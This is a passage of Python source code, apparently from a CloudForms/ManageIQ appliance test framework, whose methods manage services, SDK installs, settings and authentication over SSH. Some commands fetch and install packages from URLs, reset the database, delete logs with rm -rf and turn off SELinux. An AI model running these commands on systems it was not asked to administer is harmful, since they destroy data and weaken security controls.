log_callback("Running command '{}' against the evmserverd service".format(command))
with self.ssh_client as ssh:
result = ssh.run_command('systemctl {} evmserverd'.format(command))
if expected_exit_code is not None and result.rc != expected_exit_code:
msg = ('Failed to {} evmserverd on {}\nError: {}'
.format(command, self.hostname, result.output))
log_callback(msg)
raise ApplianceException(msg)
return result.rc
@logger_wrap("Status of EVM service: {}")
def is_evm_service_running(self, log_callback=None):
"""Checks the ``evmserverd`` service status on this appliance
"""
return self._evm_service_command("status", log_callback=log_callback) == 0
@logger_wrap("Start EVM Service: {}")
def start_evm_service(self, log_callback=None):
"""Starts the ``evmserverd`` service on this appliance
"""
self._evm_service_command('start', expected_exit_code=0, log_callback=log_callback)
@logger_wrap("Stop EVM Service: {}")
def stop_evm_service(self, log_callback=None):
"""Stops the ``evmserverd`` service on this appliance
"""
self._evm_service_command('stop', expected_exit_code=0, log_callback=log_callback)
@logger_wrap("Restart EVM Service: {}")
def restart_evm_service(self, rude=False, log_callback=None):
"""Restarts the ``evmserverd`` service on this appliance
"""
store.terminalreporter.write_line('evmserverd is being restarted, be patient please')
with self.ssh_client as ssh:
if rude:
self.evmserverd.stop()
log_callback('Waiting for evm service to stop')
try:
wait_for(
self.is_evm_service_running, num_sec=120, fail_condition=True, delay=10,
message='evm service to stop')
except TimedOutError:
# Don't care if it's still running
pass
log_callback('killing any remaining processes and restarting postgres')
ssh.run_command(
'killall -9 ruby; systemctl restart {}-postgresql'
.format(self.db.postgres_version))
log_callback('Waiting for database to be available')
wait_for(
lambda: self.db.is_online, num_sec=90, delay=10, fail_condition=False,
message="database to be available")
self.evmserverd.start()
else:
self.evmserverd.restart()
@logger_wrap("Waiting for EVM service: {}")
def wait_for_evm_service(self, timeout=900, log_callback=None):
"""Waits for the evemserverd service to be running
Args:
timeout: Number of seconds to wait until timeout (default ``900``)
"""
log_callback('Waiting for evmserverd to be running')
result, wait = wait_for(self.is_evm_service_running, num_sec=timeout,
fail_condition=False, delay=10)
return result
@logger_wrap("Rebooting Appliance: {}")
def reboot(self, wait_for_web_ui=True, log_callback=None):
log_callback('Rebooting appliance')
client = self.ssh_client
old_uptime = client.uptime()
client.run_command('reboot')
wait_for(lambda: client.uptime() < old_uptime, handle_exception=True,
num_sec=600, message='appliance to reboot', delay=10)
if wait_for_web_ui:
self.wait_for_web_ui()
@logger_wrap("Waiting for web_ui: {}")
def wait_for_web_ui(self, timeout=900, running=True, log_callback=None):
"""Waits for the web UI to be running / to not be running
Args:
            timeout: Number of seconds to wait until timeout (default ``900``)
running: Specifies if we wait for web UI to start or stop (default ``True``)
``True`` == start, ``False`` == stop
"""
prefix = "" if running else "dis"
(log_callback or self.log.info)('Waiting for web UI to ' + prefix + 'appear')
result, wait = wait_for(self._check_appliance_ui_wait_fn, num_sec=timeout,
fail_condition=not running, delay=10)
return result
@logger_wrap("Install VDDK: {}")
def install_vddk(self, force=False, vddk_url=None, log_callback=None):
"""Install the vddk on a appliance"""
def log_raise(exception_class, message):
log_callback(message)
raise exception_class(message)
if vddk_url is None: # fallback to VDDK 5.5
vddk_url = conf.cfme_data.get("basic_info", {}).get("vddk_url", {}).get("v5_5")
if vddk_url is None:
raise Exception("vddk_url not specified!")
with self.ssh_client as client:
is_already_installed = False
if client.run_command('test -d /usr/lib/vmware-vix-disklib/lib64').success:
is_already_installed = True
if not is_already_installed or force:
# start
filename = vddk_url.split('/')[-1]
# download
log_callback('Downloading VDDK')
result = client.run_command('curl {} -o {}'.format(vddk_url, filename))
if result.failed:
log_raise(Exception, "Could not download VDDK")
# install
log_callback('Installing vddk')
result = client.run_command(
'yum -y install {}'.format(filename))
if result.failed:
log_raise(
Exception,
'VDDK installation failure (rc: {})\n{}'.format(result.rc, result.output)
)
# verify
log_callback('Verifying vddk')
result = client.run_command('ldconfig -p | grep vix')
if len(result.output) < 2:
log_raise(
Exception,
"Potential installation issue, libraries not detected\n{}"
.format(result.output)
)
@logger_wrap("Uninstall VDDK: {}")
def uninstall_vddk(self, log_callback=None):
"""Uninstall the vddk from an appliance"""
with self.ssh_client as client:
is_installed = client.run_command('test -d /usr/lib/vmware-vix-disklib/lib64').success
if is_installed:
result = client.run_command('yum -y remove vmware-vix-disklib')
if result.failed:
log_callback('VDDK removing failure (rc: {})\n{}'
.format(result.rc, result.output))
raise Exception('VDDK removing failure (rc: {})\n{}'
.format(result.rc, result.output))
else:
log_callback('VDDK has been successfully removed.')
else:
log_callback('VDDK is not installed.')
@logger_wrap("Install Netapp SDK: {}")
def install_netapp_sdk(self, sdk_url=None, reboot=False, log_callback=None):
"""Installs the Netapp SDK.
Args:
            sdk_url: URL of the SDK zip file (optional).
            reboot: Whether to reboot the appliance afterwards (default False, but a reboot is
                required before the SDK can be used).
"""
def log_raise(exception_class, message):
log_callback(message)
raise exception_class(message)
if sdk_url is None:
try:
sdk_url = conf.cfme_data['basic_info']['netapp_sdk_url']
except KeyError:
raise Exception("cfme_data.yaml/basic_info/netapp_sdk_url is not present!")
filename = sdk_url.split('/')[-1]
foldername = os.path.splitext(filename)[0]
with self.ssh_client as ssh:
log_callback('Downloading SDK from {}'.format(sdk_url))
result = ssh.run_command(
'wget {url} -O {file} > /root/unzip.out 2>&1'.format(
url=sdk_url, file=filename))
if result.failed:
log_raise(Exception, 'Could not download Netapp SDK: {}'.format(result.output))
log_callback('Extracting SDK ({})'.format(filename))
result = ssh.run_command(
'unzip -o -d /var/www/miq/vmdb/lib/ {}'.format(filename))
if result.failed:
log_raise(Exception, 'Could not extract Netapp SDK: {}'.format(result.output))
path = '/var/www/miq/vmdb/lib/{}/lib/linux-64'.format(foldername)
# Check if we haven't already added this line
if ssh.run_command("grep -F '{}' /etc/default/evm".format(path)).failed:
log_callback('Installing SDK ({})'.format(foldername))
result = ssh.run_command(
'echo "export LD_LIBRARY_PATH=\$LD_LIBRARY_PATH:{}" >> /etc/default/evm'.format(
path))
if result.failed:
log_raise(Exception, 'SDK installation failure ($?={}): {}'
.format(result.rc, result.output))
else:
log_callback("Not needed to install, already done")
log_callback('ldconfig')
ssh.run_command('ldconfig')
log_callback('Modifying YAML configuration')
c_yaml = {'product': {'storage': True}}
self.update_advanced_settings(c_yaml)
# To mark that we installed netapp
ssh.run_command("touch /var/www/miq/vmdb/HAS_NETAPP")
if reboot:
self.reboot(log_callback=log_callback)
else:
log_callback(
'Appliance must be restarted before the netapp functionality can be used.')
clear_property_cache(self, 'is_storage_enabled')
@logger_wrap('Updating appliance UUID: {}')
def update_guid(self, log_callback=None):
guid_gen = 'uuidgen |tee /var/www/miq/vmdb/GUID'
log_callback('Running {} to generate UUID'.format(guid_gen))
with self.ssh_client as ssh:
result = ssh.run_command(guid_gen)
assert result.success, 'Failed to generate UUID'
log_callback('Updated UUID: {}'.format(str(result)))
try:
del self.__dict__['guid'] # invalidate cached_property
except KeyError:
logger.exception('Exception clearing cached_property "guid"')
return str(result).rstrip('\n') # should return UUID from stdout
def wait_for_ssh(self, timeout=600):
"""Waits for appliance SSH connection to be ready
Args:
timeout: Number of seconds to wait until timeout (default ``600``)
"""
wait_for(func=lambda: self.is_ssh_running,
message='appliance.is_ssh_running',
delay=5,
num_sec=timeout)
@property
def _ansible_pod_name(self):
if self.is_pod:
if self.version >= '5.9':
get_ansible_name = ("basename $(oc get pods -lname=ansible "
"-o name --namespace={n})".format(n=self.project))
return str(self.ssh_client.run_command(get_ansible_name, ensure_host=True)).strip()
else:
# ansible stuff lives in the same container with main app in 5.8
return self.container
else:
return None
@property
def is_supervisord_running(self):
output = self.ssh_client.run_command("systemctl status supervisord",
container=self._ansible_pod_name)
return output.success
@property
def is_nginx_running(self):
output = self.ssh_client.run_command("systemctl status nginx",
container=self._ansible_pod_name)
return output.success
@property
def is_rabbitmq_running(self):
output = self.ssh_client.run_command("systemctl status rabbitmq-server",
container=self._ansible_pod_name)
return output.success
@property
def is_embedded_ansible_role_enabled(self):
return self.server_roles.get("embedded_ansible", False)
@property
def is_embedded_ansible_running(self):
return self.is_embedded_ansible_role_enabled and self.is_supervisord_running
def wait_for_embedded_ansible(self, timeout=900):
"""Waits for embedded ansible to be ready
Args:
timeout: Number of seconds to wait until timeout (default ``900``)
"""
wait_for(
func=lambda: self.is_embedded_ansible_running,
message='appliance.is_embedded_ansible_running',
delay=60,
num_sec=timeout
)
@cached_property
def get_host_address(self):
try:
server = self.advanced_settings.get('server')
if server:
return server.get('host')
except Exception as e:
logger.exception(e)
            self.log.error('Exception occurred while fetching host address')
def wait_for_host_address(self):
try:
wait_for(func=lambda: getattr(self, 'get_host_address'),
fail_condition=None,
delay=5,
num_sec=120)
return self.get_host_address
except Exception as e:
logger.exception(e)
            self.log.error('Waiting for host address from yaml_config timed out')
@property
def is_ssh_running(self):
if self.openshift_creds and 'hostname' in self.openshift_creds:
hostname = self.openshift_creds['hostname']
else:
hostname = self.hostname
return net_check(ports.SSH, hostname, force=True)
@property
def has_cli(self):
return self.ssh_client.run_command('hash appliance_console_cli').success
@property
def is_idle(self):
"""Return appliance idle state measured by last production.log activity.
        Runs a one-liner script which gathers the current date on the appliance and the
        timestamp of the last entry in production.log (which has to be parsed), filtering
        out the periodic /api calls (these occur every minute).
        It then subtracts that last log time from the current date; if the difference is
        lower than ``idle_time`` seconds the appliance is considered busy, otherwise idle.
        Returns:
            True if the appliance has been idling for at least ``idle_time`` seconds,
            False otherwise.
"""
idle_time = 3600
ssh_output = self.ssh_client.run_command('if [ $((`date "+%s"` - `date -d "$(egrep -v '
'"(Processing by Api::ApiController\#index as JSON|Started GET "/api" for '
'127.0.0.1|Completed 200 OK in)" /var/www/miq/vmdb/log/production.log | tail -1 |cut '
'-d"[" -f3 | cut -d"]" -f1 | cut -d" " -f1)\" \"+%s\"`)) -lt {} ];'
'then echo "False";'
'else echo "True";'
'fi;'.format(idle_time))
        return 'True' in ssh_output
@cached_property
def build_datetime(self):
build_datetime_string = self.build.split('_', 1)[0]
return datetime.strptime(build_datetime_string, '%Y%m%d%H%M%S')
@cached_property
def build_date(self):
return self.build_datetime.date()
def has_netapp(self):
return self.ssh_client.appliance_has_netapp()
@cached_property
def guid(self):
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.guid
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.guid could not be retrieved from REST, falling back')
result = self.ssh_client.run_command('cat /var/www/miq/vmdb/GUID')
return result.output
@cached_property
def evm_id(self):
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.id
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.evm_id could not be retrieved from REST, falling back')
miq_servers = self.db.client['miq_servers']
return self.db.client.session.query(
miq_servers.id).filter(miq_servers.guid == self.guid)[0][0]
@property
def fqdn(self):
"""fqdn from appliance_console
        This should likely be 'hostname' as that is what it's called on the appliance.
        Currently the hostname attribute holds the IP address.
"""
return self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href']).hostname
def get_disabled_regions(self, provider=None):
"""Fetch appliance advanced config, get disabled regions for given provider's type
Only relevant for cloud providers azure and ec2 at the moment
Args:
provider: A BaseProvider object with settings_key attribute
Returns:
            Default: dict of ems_<provider> keys mapped to their disabled_regions lists
            when provider given: disabled_regions list from config
            when no matching config is found: an empty list or dict
"""
ems_config = self.advanced_settings.get('ems')
if provider and ems_config:
try:
prov_config = ems_config.get(getattr(provider, 'settings_key', None), {}) # safe
regions = prov_config['disabled_regions'] # KeyError
except KeyError:
regions = []
elif ems_config:
regions = {ems_key: yaml['disabled_regions']
for ems_key, yaml in ems_config.items()
if 'disabled_regions' in yaml}
else:
# 'ems' was NOT in advanced_settings
regions = {}
return regions
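    # Editor's note: example return shapes, assuming a typical 'ems' section in
    # the advanced settings (region names are illustrative, not from a live box):
    #
    #   appliance.get_disabled_regions()
    #   # -> {'ems_azure': ['usgovarizona'], 'ems_amazon': ['us-gov-west-1']}
    #   appliance.get_disabled_regions(provider=my_azure_provider)
    #   # -> ['usgovarizona']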
def set_disabled_regions(self, provider, *regions):
"""Modify config to set disabled regions to given regions for the given provider's type
Only relevant for cloud providers azure and ec2 at the moment
Does NOT APPEND to the list of disabled regions, SETS it
Args:
provider: A BaseProvider object with settings_key attribute
*regions: none, one or many region names, on None enables all regions for provider type
Raises:
AssertionError - when the disabled regions don't match after setting
ApplianceException - when there's a KeyError modifying the yaml
"""
try:
yaml_conf = {
'ems': {getattr(provider, 'settings_key', None): {'disabled_regions': regions}}
}
except KeyError:
# catches not-found settings_key or 'None' when the provider doesn't have it
            raise ApplianceException('Provider {} settings_key attribute not set '
                                     'or not found in config {}'
                                     .format(provider, yaml_conf['ems']))
self.update_advanced_settings(yaml_conf)
assert self.get_disabled_regions(provider) == list(regions) # its a tuple if empty
@property
def server_roles(self):
"""Return a dictionary of server roles from database"""
asr = self.db.client['assigned_server_roles']
sr = self.db.client['server_roles']
all_role_names = {row[0] for row in self.db.client.session.query(sr.name)}
# Query all active server roles assigned to this server
query = self.db.client.session\
.query(sr.name)\
.join(asr, asr.server_role_id == sr.id)\
.filter(asr.miq_server_id == self.evm_id)\
.filter(asr.active == True) # noqa
active_roles = {row[0] for row in query}
roles = {role_name: role_name in active_roles for role_name in all_role_names}
dead_keys = ['database_owner', 'vdi_inventory']
for key in roles:
if not self.is_storage_enabled:
if key.startswith('storage'):
dead_keys.append(key)
if key == 'vmdb_storage_bridge':
dead_keys.append(key)
for key in dead_keys:
try:
del roles[key]
except KeyError:
pass
return roles
@server_roles.setter
def server_roles(self, roles):
"""Sets the server roles. Requires a dictionary full of the role keys with bool values."""
if self.server_roles == roles:
self.log.debug(' Roles already match, returning...')
return
ansible_old = self.server_roles.get('embedded_ansible', False)
ansible_new = roles.get('embedded_ansible', False)
enabling_ansible = ansible_old is False and ansible_new is True
server_data = self.advanced_settings.get('server', {})
server_data['role'] = ','.join([role for role, boolean in roles.items() if boolean])
self.update_advanced_settings({'server': server_data})
timeout = 600 if enabling_ansible else 300
wait_for(lambda: self.server_roles == roles, num_sec=timeout, delay=15)
if enabling_ansible:
self.wait_for_embedded_ansible()
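    # Editor's note: typical usage of the roles getter/setter pair; the role
    # name shown is illustrative:
    #
    #   roles = appliance.server_roles            # e.g. {'automate': True, ...}
    #   roles['notifier'] = True
    #   appliance.server_roles = roles            # blocks until the DB agrees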
def enable_embedded_ansible_role(self):
"""Enables embbeded ansible role
This is necessary because server_roles does not wait long enough"""
roles = self.server_roles
roles['embedded_ansible'] = True
try:
self.server_roles = roles
except TimedOutError:
wait_for(lambda: self.server_roles == roles, num_sec=600, delay=15)
self.wait_for_embedded_ansible()
def disable_embedded_ansible_role(self):
"""disables embbeded ansible role"""
roles = self.server_roles
roles['embedded_ansible'] = False
self.server_roles = roles
def update_server_roles(self, changed_roles):
server_roles = self.server_roles.copy()
server_roles.update(changed_roles)
self.server_roles = server_roles
return server_roles == self.server_roles
def server_id(self):
try:
return self.server.sid
except IndexError:
return None
def server_region_string(self):
r = self.server.zone.region.number
return "{} Region: Region {} [{}]".format(
self.product_name, r, r)
@cached_property
def company_name(self):
return self.advanced_settings["server"]["company"]
def host_id(self, hostname):
hosts = list(
self.db.client.session.query(self.db.client["hosts"]).filter(
self.db.client["hosts"].name == hostname
)
)
if hosts:
return str(hosts[0].id)
else:
return None
@cached_property
def is_storage_enabled(self):
return 'storage' in self.advanced_settings.get('product', {})
@property
def advanced_settings(self):
"""Get settings from the base api/settings endpoint for appliance"""
if self.version > '5.9':
return self.rest_api.get(self.rest_api.collections.settings._href)
else:
writeout = self.ssh_client.run_rails_command(
'"File.open(\'/tmp/yam_dump.yaml\', \'w\') '
'{|f| f.write(Settings.to_hash.deep_stringify_keys.to_yaml) }"'
)
if writeout.rc:
logger.error("Config couldn't be found")
logger.error(writeout.output)
raise Exception('Error obtaining config')
base_data = self.ssh_client.run_command('cat /tmp/yam_dump.yaml')
if base_data.rc:
logger.error("Config couldn't be found")
logger.error(base_data.output)
raise Exception('Error obtaining config')
try:
return yaml.load(base_data.output)
except Exception:
logger.debug(base_data.output)
raise
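    # Editor's note: a hedged read example; the nested keys mirror the
    # appliance's settings yaml, so e.g. the server name can be fetched as:
    #
    #   name = appliance.advanced_settings.get('server', {}).get('name')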
def update_advanced_settings(self, settings_dict):
"""PATCH settings from the master server's api/server/:id/settings endpoint
Uses REST API for CFME 5.9+, uses rails console on lower versions
Will automatically update existing settings dictionary with settings_dict
Args:
            settings_dict: dictionary of the changes to be made to the yaml configuration
        JSON dumps settings_dict to pass as raw hash data to rest_api session
Raises:
ApplianceException when server_id isn't set
"""
# Can only modify through server ID, raise if that's not set yet
if self.version < '5.9':
data_dict_base = self.advanced_settings
data_dict_base.update(settings_dict)
temp_yaml = NamedTemporaryFile()
dest_yaml = '/tmp/conf.yaml'
yaml.dump(data_dict_base, temp_yaml, default_flow_style=False)
self.ssh_client.put_file(temp_yaml.name, dest_yaml)
# Build and send ruby script
dest_ruby = '/tmp/set_conf.rb'
ruby_template = data_path.join('utils', 'cfmedb_set_config.rbt')
ruby_replacements = {
'config_file': dest_yaml
}
temp_ruby = load_data_file(ruby_template.strpath, ruby_replacements)
self.ssh_client.put_file(temp_ruby.name, dest_ruby)
# Run it
result = self.ssh_client.run_rails_command(dest_ruby)
if not result:
raise Exception('Unable to set config: {!r}:{!r}'.format(result.rc, result.output))
else:
if self.server_id() is None:
raise ApplianceException('No server id is set, cannot modify yaml config via REST')
self.server.update_advanced_settings(settings_dict)
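    # Editor's note: the patch is a partial dict that is merged/patched into the
    # existing settings; only the keys present in the patch are touched. The
    # rename() method below uses exactly this shape:
    #
    #   appliance.update_advanced_settings({'server': {'name': 'new-name'}})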
def set_session_timeout(self, timeout=86400, quiet=True):
"""Sets the timeout of UI timeout.
Args:
timeout: Timeout in seconds
quiet: Whether to ignore any errors
"""
try:
session_config = self.advanced_settings.get('session', {})
if session_config.get('timeout') != timeout:
session_config['timeout'] = timeout
self.update_advanced_settings({'session': session_config})
except Exception as ex:
logger.error('Setting session timeout failed:')
logger.exception(ex)
if not quiet:
raise
def delete_all_providers(self):
logger.info('Destroying all appliance providers')
for prov in self.rest_api.collections.providers:
prov.action.delete()
def reset_automate_model(self):
with self.ssh_client as ssh_client:
ssh_client.run_rake_command("evm:automate:reset")
def clean_appliance(self):
starttime = time()
self.ssh_client.run_command('service evmserverd stop')
self.ssh_client.run_command('sync; sync; echo 3 > /proc/sys/vm/drop_caches')
self.ssh_client.run_command('service collectd stop')
self.ssh_client.run_command('service {}-postgresql restart'.format(
self.db.postgres_version))
self.ssh_client.run_command(
'cd /var/www/miq/vmdb; bin/rake evm:db:reset')
self.ssh_client.run_rake_command('db:seed')
self.ssh_client.run_command('service collectd start')
self.ssh_client.run_command('rm -rf /var/www/miq/vmdb/log/*.log*')
self.ssh_client.run_command('rm -rf /var/www/miq/vmdb/log/apache/*.log*')
self.ssh_client.run_command('service evmserverd start')
self.wait_for_evm_service()
logger.debug('Cleaned appliance in: {}'.format(round(time() - starttime, 2)))
def set_full_refresh_threshold(self, threshold=100):
yaml_data = {'ems_refresh': {'full_refresh_threshold': threshold}}
self.update_advanced_settings(yaml_data)
def set_cap_and_util_all_via_rails(self):
"""Turns on Collect for All Clusters and Collect for all Datastores without using Web UI."""
command = (
'Metric::Targets.perf_capture_always = {:storage=>true, :host_and_cluster=>true};')
self.ssh_client.run_rails_console(command, timeout=None)
def set_cfme_server_relationship(self, vm_name, server_id=1):
"""Set MiqServer record to the id of a VM by name, effectively setting the CFME Server
Relationship without using the Web UI."""
command = ('miq_server = MiqServer.find_by(id: {});'
'miq_server.vm_id = Vm.find_by(name: \'{}\').id;'
'miq_server.save'.format(server_id, vm_name))
self.ssh_client.run_rails_console(command, timeout=None)
def set_pglogical_replication(self, replication_type=':none'):
"""Set pglogical replication type (:none, :remote, :global) without using the Web UI."""
command = ('MiqRegion.replication_type = {}'.format(replication_type))
self.ssh_client.run_rails_console(command, timeout=None)
def add_pglogical_replication_subscription(self, host):
"""Add a pglogical replication subscription without using the Web UI."""
user = conf.credentials['ssh']['username']
password = conf.credentials['ssh']['password']
dbname = 'vmdb_production'
port = 5432
command = ('sub = PglogicalSubscription.new;'
'sub.dbname = \'{}\';'
'sub.host = \'{}\';'
'sub.user = \'{}\';'
'sub.password = \'{}\';'
'sub.port = {};'
'sub.save'.format(dbname, host, user, password, port))
self.ssh_client.run_rails_console(command, timeout=None)
def set_rubyrep_replication(self, host, port=5432, database='vmdb_production',
username='root', password=None):
"""Sets up rubyrep replication via advanced configuration settings yaml."""
password = password or self._encrypt_string(conf.credentials['ssh']['password'])
yaml_data = {'workers': {'worker_base': {'replication_worker': {'replication': {
'destination': {}}}}}
}
dest = yaml_data['workers']['worker_base']['replication_worker']['replication'][
'destination']
dest['database'] = database
dest['username'] = username
dest['password'] = password
dest['port'] = port
dest['host'] = host
logger.debug('Dest: {}'.format(yaml_data))
self.update_advanced_settings(yaml_data)
def wait_for_miq_server_workers_started(self, evm_tail=None, poll_interval=5):
"""Waits for the CFME's workers to be started by tailing evm.log for:
'INFO -- : MIQ(MiqServer#wait_for_started_workers) All workers have been started'
"""
if evm_tail is None:
logger.info('Opening /var/www/miq/vmdb/log/evm.log for tail')
evm_tail = SSHTail('/var/www/miq/vmdb/log/evm.log')
evm_tail.set_initial_file_end()
attempts = 0
detected = False
max_attempts = 60
while (not detected and attempts < max_attempts):
logger.debug('Attempting to detect MIQ Server workers started: {}'.format(attempts))
for line in evm_tail:
                if ('MiqServer#wait_for_started_workers' in line and
                        'All workers have been started' in line):
                    logger.info('Detected MIQ Server is ready.')
                    detected = True
                    break
sleep(poll_interval) # Allow more log lines to accumulate
attempts += 1
        if attempts >= max_attempts:
logger.error('Could not detect MIQ Server workers started in {}s.'.format(
poll_interval * max_attempts))
evm_tail.close()
@logger_wrap("Setting dev branch: {}")
def use_dev_branch(self, repo, branch, log_callback=None):
"""Sets up an exitsing appliance to change the branch to specified one and reset it.
Args:
repo: URL to the repo
branch: Branch of that repo
"""
with self.ssh_client as ssh_client:
dev_branch_cmd = 'cd /var/www/miq/vmdb; git remote add dev_branch {}'.format(repo)
if not ssh_client.run_command(dev_branch_cmd):
ssh_client.run_command('cd /var/www/miq/vmdb; git remote remove dev_branch')
if not ssh_client.run_command(dev_branch_cmd):
raise Exception('Could not add the dev_branch remote')
# We now have the repo and now let's update it
ssh_client.run_command('cd /var/www/miq/vmdb; git remote update')
self.evmserverd.stop()
ssh_client.run_command(
'cd /var/www/miq/vmdb; git checkout dev_branch/{}'.format(branch))
ssh_client.run_command('cd /var/www/miq/vmdb; bin/update')
self.start_evm_service()
self.wait_for_evm_service()
self.wait_for_web_ui()
def check_domain_enabled(self, domain):
namespaces = self.db.client["miq_ae_namespaces"]
q = self.db.client.session.query(namespaces).filter(
namespaces.parent_id == None, namespaces.name == domain) # NOQA (for is/==)
try:
return list(q)[0].enabled
except IndexError:
raise KeyError("No such Domain: {}".format(domain))
@logger_wrap('Configuring openldap external auth provider')
def configure_openldap(self, auth_provider, log_callback=None):
"""This method changes the /etc/sssd/sssd.conf and /etc/openldap/ldap.conf files to set
up the appliance for an external authentication with OpenLdap.
Apache file configurations are updated, for webui to take effect.
Args:
auth_provider: auth provider object derived from cfme.utils.auth.MIQAuthProvider
"""
# write /etc/hosts entry for ldap hostname TODO DNS
for key in ['ipaddress', 'cert_filename', 'cert_filepath', 'ldap_conf', 'sssd_conf']:
if not auth_provider.get(key): # either not set, or None
raise ValueError('Auth Provider object {} needs attribute {} for external openldap'
.format(auth_provider, key))
self.ssh_client.run_command('echo "{} {}" >> /etc/hosts'
.format(auth_provider.ipaddress, auth_provider.host1))
# place cert from local conf directory on ldap server
self.ssh_client.put_file(local_file=conf_path.join(auth_provider.cert_filename).strpath,
remote_file=auth_provider.cert_filepath)
# configure ldap and sssd with conf file content from yaml
assert self.ssh_client.run_command('echo "{s}" > {c}'
.format(s=auth_provider.ldap_conf,
c=self.CONF_FILES['openldap']))
assert self.ssh_client.run_command('echo "{s}" > {c}'
.format(s=auth_provider.sssd_conf,
c=self.CONF_FILES['sssd']))
        assert self.ssh_client.run_command('chown -R root:root {}'.format(self.CONF_FILES['sssd']))
        assert self.ssh_client.run_command('chmod 600 {}'.format(self.CONF_FILES['sssd']))
# copy miq/cfme template files for httpd ext auth config
template_dir = self.CONF_FILES.get('downstream_templates'
if self.is_downstream
else 'upstream_templates')
# pam httpd-auth and httpd remote-user.conf
for conf_file in [self.CONF_FILES['pam_httpd_auth'], self.CONF_FILES['httpd_remote_user']]:
assert self.ssh_client.run_command('cp {t}{c} {c}'.format(t=template_dir, c=conf_file))
# https external-auth conf, template has extra '.erb' suffix
assert self.ssh_client.run_command('cp {t}{c}.erb {c}'
.format(t=template_dir,
c=self.CONF_FILES['httpd_ext_auth']))
assert self.ssh_client.run_command('setenforce 0')
self.sssd.restart()
self.httpd.restart()
self.wait_for_web_ui()
# UI configuration of auth provider type
self.server.authentication.configure(auth_mode='external', auth_provider=auth_provider)
@logger_wrap('Disabling openldap external auth provider')
def disable_openldap(self, log_callback=None):
self.server.authentication.configure_auth()
files_to_remove = [
self.CONF_FILES['sssd'],
self.CONF_FILES['pam_httpd_auth'],
self.CONF_FILES['httpd_ext_auth'],
self.CONF_FILES['httpd_remote_user']
]
for conf_file in files_to_remove:
assert self.ssh_client.run_command('rm -f $(ls {})'.format(conf_file))
self.evmserverd.restart()
self.httpd.restart()
self.wait_for_web_ui()
self.server.authentication.configure_auth(auth_mode='database')
@logger_wrap('Configuring freeipa external auth provider')
def configure_freeipa(self, auth_provider, log_callback=None):
"""Configure appliance UI and backend for freeIPA
Args:
auth_provider: An auth provider class derived from cfme.utils.auth.BaseAuthProvider
Notes:
Completes backend config via appliance_console_cli
Completes UI configuration for external auth mode
"""
if self.is_pod:
# appliance_console_cli fails when calls hostnamectl --host. it seems docker issue
# raise BZ ?
assert str(self.ssh_client.run_command('hostname')).rstrip() == self.fqdn
# First, clear any existing ipa config, runs clean if not configured
self.appliance_console_cli.uninstall_ipa_client()
self.wait_for_web_ui() # httpd restart in uninstall-ipa
# ext auth ipa requires NTP sync
if auth_provider.host1 not in self.server.settings.ntp_servers_values:
self.server.settings.update_ntp_servers({'ntp_server_1': auth_provider.host1})
# backend appliance configuration of ext auth provider
self.appliance_console_cli.configure_ipa(**auth_provider.as_external_value())
# UI configuration of auth provider type
self.server.authentication.configure(auth_mode='external', auth_provider=auth_provider)
# restart httpd
self.httpd.restart()
@logger_wrap('Disabling freeipa external auth provider')
def disable_freeipa(self, log_callback=None):
"""Switch UI back to database authentication, and run --uninstall-ipa on appliance"""
self.appliance_console_cli.uninstall_ipa_client()
self.server.authentication.configure(auth_mode='database')
self.wait_for_web_ui() # httpd restart in uninstall-ipa
@logger_wrap("Configuring VM Console: {}")
def configure_vm_console_cert(self, log_callback=None):
"""This method generates a self signed SSL cert and installs it
in the miq/vmdb/certs dir. This cert will be used by the
HTML 5 VM Console feature. Note evmserverd needs to be restarted
after running this.
"""
log_callback('Installing SSL certificate')
cert = conf.cfme_data['vm_console'].get('cert')
if cert is None:
raise Exception('vm_console:cert does not exist in cfme_data.yaml')
cert_file = os.path.join(cert.install_dir, 'server.cer')
key_file = os.path.join(cert.install_dir, 'server.cer.key')
cert_generator = scripts_path.join('gen_ssl_cert.py').strpath
remote_cert_generator = os.path.join('/usr/bin', 'gen_ssl_cert.py')
# Copy self signed SSL certificate generator to the appliance
# because it needs to get the FQDN for the cert it generates.
self.ssh_client.put_file(cert_generator, remote_cert_generator)
# Generate cert
command = (
'{cert_generator}'
' --C "{country}"'
' --ST "{state}"'
' --L "{city}"'
' --O "{organization}"'
' --OU "{organizational_unit}"'
' --keyFile "{key}"'
' --certFile "{cert}"'
.format(
cert_generator=remote_cert_generator,
country=cert.country,
state=cert.state,
city=cert.city,
organization=cert.organization,
organizational_unit=cert.organizational_unit,
key=key_file,
cert=cert_file,
)
)
result = self.ssh_client.run_command(command)
        if result.rc != 0:
raise Exception(
'Failed to generate self-signed SSL cert on appliance: {}'.format(
result.output
)
)
class Appliance(IPAppliance):
"""Appliance represents an already provisioned cfme appliance vm
**DO NOT INSTANTIATE DIRECTLY - USE :py:meth:`from_provider`**
"""
_default_name = 'EVM'
@property
def ipapp(self):
# For backwards compat
return self
@classmethod
def from_provider(cls, provider_key, vm_name, name=None, **kwargs):
"""Constructor of this Appliance.
Retrieves the IP address of the appliance from the provider and then instantiates it,
adding some extra parameters that are required by this class.
Args:
            provider_key: Key of the provider this appliance is running under
vm_name: Name of the VM this appliance is running as
browser_steal: Setting of the browser_steal attribute.
"""
from cfme.utils.providers import get_mgmt
provider = get_mgmt(provider_key)
def is_ip_available():
try:
ip = provider.get_ip_address(vm_name)
if ip is None:
return False
else:
return ip
except AttributeError:
return False
if 'hostname' in kwargs:
hostname = kwargs.pop('hostname')
else:
ec, tc = wait_for(is_ip_available,
delay=5,
num_sec=600)
hostname = str(ec)
appliance = cls(hostname=hostname, **kwargs)
appliance.vm_name = vm_name
appliance.provider = provider
appliance.provider_key = provider_key
appliance.name = name or cls._default_name
return appliance
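    # Editor's note: illustrative construction; the provider key and VM name
    # are hypothetical and would normally come from cfme_data / the provider:
    #
    #   appliance = Appliance.from_provider('vsphere55', 'cfme-59-test-vm')
    #   appliance.configure()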
def _custom_configure(self, **kwargs):
log_callback = kwargs.pop(
"log_callback",
lambda msg: logger.info("Custom configure %s: %s", self.vm_name, msg))
region = kwargs.get('region', 0)
db_address = kwargs.get('db_address')
key_address = kwargs.get('key_address')
db_username = kwargs.get('db_username')
        db_password = kwargs.get('db_password')
ssh_password = kwargs.get('ssh_password')
db_name = kwargs.get('db_name')
on_openstack = kwargs.pop('on_openstack', False)
if kwargs.get('fix_ntp_clock', True) is True:
